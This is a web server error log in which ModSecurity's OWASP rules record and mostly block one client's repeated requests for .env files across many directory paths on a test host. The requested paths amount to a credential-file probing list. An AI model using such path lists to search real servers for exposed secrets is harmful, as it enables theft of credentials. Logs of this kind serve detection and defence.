[Wed Jan 14 17:35:20.585963 2026] [:error] [pid 1413484] [client 34.220.197.24:45276] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWfFyPcsqy-MSlD5wL45GQAAAAY"]
[Wed Jan 14 17:35:21.307483 2026] [:error] [pid 1413459] [client 34.220.197.24:45452] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWfFyUmBk0CuCHAyPqetIgAAAAM"]
[Wed Jan 14 17:35:21.307698 2026] [:error] [pid 1413459] [client 34.220.197.24:45452] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWfFyUmBk0CuCHAyPqetIgAAAAM"]
[Wed Jan 14 17:35:21.307873 2026] [:error] [pid 1413459] [client 34.220.197.24:45452] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWfFyUmBk0CuCHAyPqetIgAAAAM"]
[Wed Jan 14 17:35:22.030060 2026] [:error] [pid 1413458] [client 34.220.197.24:45622] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWfFysPNANEsYGk5QcxtFgAAAAI"]
[Wed Jan 14 17:35:22.030315 2026] [:error] [pid 1413458] [client 34.220.197.24:45622] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWfFysPNANEsYGk5QcxtFgAAAAI"]
[Wed Jan 14 17:35:22.031026 2026] [:error] [pid 1413458] [client 34.220.197.24:45622] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWfFysPNANEsYGk5QcxtFgAAAAI"]
[Wed Jan 14 17:35:22.754106 2026] [:error] [pid 1413460] [client 34.220.197.24:45786] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWfFygByDtVd7SkMa28kZwAAAAQ"]
[Wed Jan 14 17:35:22.754323 2026] [:error] [pid 1413460] [client 34.220.197.24:45786] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWfFygByDtVd7SkMa28kZwAAAAQ"]
[Wed Jan 14 17:35:22.754515 2026] [:error] [pid 1413460] [client 34.220.197.24:45786] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWfFygByDtVd7SkMa28kZwAAAAQ"]
[Wed Jan 14 17:35:23.474126 2026] [:error] [pid 1413457] [client 34.220.197.24:45962] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWfFy9edw_XRw0xH6MrJUQAAAAE"]
[Wed Jan 14 17:35:23.474334 2026] [:error] [pid 1413457] [client 34.220.197.24:45962] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWfFy9edw_XRw0xH6MrJUQAAAAE"]
[Wed Jan 14 17:35:23.474521 2026] [:error] [pid 1413457] [client 34.220.197.24:45962] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWfFy9edw_XRw0xH6MrJUQAAAAE"]
[Wed Jan 14 17:35:24.189403 2026] [:error] [pid 1413456] [client 34.220.197.24:46140] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWfFzMFbvLGMHoHvQxNzMAAAAAA"]
[Wed Jan 14 17:35:24.189614 2026] [:error] [pid 1413456] [client 34.220.197.24:46140] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWfFzMFbvLGMHoHvQxNzMAAAAAA"]
[Wed Jan 14 17:35:24.189789 2026] [:error] [pid 1413456] [client 34.220.197.24:46140] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWfFzMFbvLGMHoHvQxNzMAAAAAA"]
[Wed Jan 14 17:35:24.903395 2026] [:error] [pid 1413485] [client 34.220.197.24:46326] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWfFzLz8c3lrfqFQknOrcwAAAAc"]
[Wed Jan 14 17:35:24.903618 2026] [:error] [pid 1413485] [client 34.220.197.24:46326] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWfFzLz8c3lrfqFQknOrcwAAAAc"]
[Wed Jan 14 17:35:24.903788 2026] [:error] [pid 1413485] [client 34.220.197.24:46326] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWfFzLz8c3lrfqFQknOrcwAAAAc"]
[Wed Jan 14 17:35:25.620877 2026] [:error] [pid 1413483] [client 34.220.197.24:46484] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWfFzUEv6TAVy2O49w-G3wAAAAU"]
[Wed Jan 14 17:35:25.621085 2026] [:error] [pid 1413483] [client 34.220.197.24:46484] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWfFzUEv6TAVy2O49w-G3wAAAAU"]
[Wed Jan 14 17:35:25.621262 2026] [:error] [pid 1413483] [client 34.220.197.24:46484] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWfFzUEv6TAVy2O49w-G3wAAAAU"]
[Wed Jan 14 17:35:26.337614 2026] [:error] [pid 1413484] [client 34.220.197.24:46656] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWfFzvcsqy-MSlD5wL45GgAAAAY"]
[Wed Jan 14 17:35:26.337824 2026] [:error] [pid 1413484] [client 34.220.197.24:46656] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWfFzvcsqy-MSlD5wL45GgAAAAY"]
[Wed Jan 14 17:35:26.338002 2026] [:error] [pid 1413484] [client 34.220.197.24:46656] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWfFzvcsqy-MSlD5wL45GgAAAAY"]
[Wed Jan 14 17:35:27.056782 2026] [:error] [pid 1413459] [client 34.220.197.24:46828] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWfFz0mBk0CuCHAyPqetIwAAAAM"]
[Wed Jan 14 17:35:27.057681 2026] [:error] [pid 1413459] [client 34.220.197.24:46828] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWfFz0mBk0CuCHAyPqetIwAAAAM"]
[Wed Jan 14 17:35:27.057880 2026] [:error] [pid 1413459] [client 34.220.197.24:46828] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWfFz0mBk0CuCHAyPqetIwAAAAM"]
[Wed Jan 14 17:35:27.775404 2026] [:error] [pid 1413458] [client 34.220.197.24:47028] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWfFz8PNANEsYGk5QcxtFwAAAAI"]
[Wed Jan 14 17:35:27.775612 2026] [:error] [pid 1413458] [client 34.220.197.24:47028] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWfFz8PNANEsYGk5QcxtFwAAAAI"]
[Wed Jan 14 17:35:27.775770 2026] [:error] [pid 1413458] [client 34.220.197.24:47028] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWfFz8PNANEsYGk5QcxtFwAAAAI"]
[Wed Jan 14 17:35:28.498230 2026] [authz_core:error] [pid 1413460] [client 34.220.197.24:47214] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Wed Jan 14 17:35:29.244970 2026] [:error] [pid 1413457] [client 34.220.197.24:47406] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWfF0dedw_XRw0xH6MrJUgAAAAE"]
[Wed Jan 14 17:35:29.245171 2026] [:error] [pid 1413457] [client 34.220.197.24:47406] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWfF0dedw_XRw0xH6MrJUgAAAAE"]
[Wed Jan 14 17:35:29.245375 2026] [:error] [pid 1413457] [client 34.220.197.24:47406] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWfF0dedw_XRw0xH6MrJUgAAAAE"]
[Wed Jan 14 17:35:29.968728 2026] [:error] [pid 1413456] [client 34.220.197.24:47592] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWfF0cFbvLGMHoHvQxNzMQAAAAA"]
[Wed Jan 14 17:35:29.968930 2026] [:error] [pid 1413456] [client 34.220.197.24:47592] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWfF0cFbvLGMHoHvQxNzMQAAAAA"]
[Wed Jan 14 17:35:29.969090 2026] [:error] [pid 1413456] [client 34.220.197.24:47592] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWfF0cFbvLGMHoHvQxNzMQAAAAA"]
[Wed Jan 14 17:35:30.687493 2026] [:error] [pid 1413485] [client 34.220.197.24:47784] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWfF0rz8c3lrfqFQknOrdAAAAAc"]
[Wed Jan 14 17:35:30.687704 2026] [:error] [pid 1413485] [client 34.220.197.24:47784] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWfF0rz8c3lrfqFQknOrdAAAAAc"]
[Wed Jan 14 17:35:30.687887 2026] [:error] [pid 1413485] [client 34.220.197.24:47784] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWfF0rz8c3lrfqFQknOrdAAAAAc"]
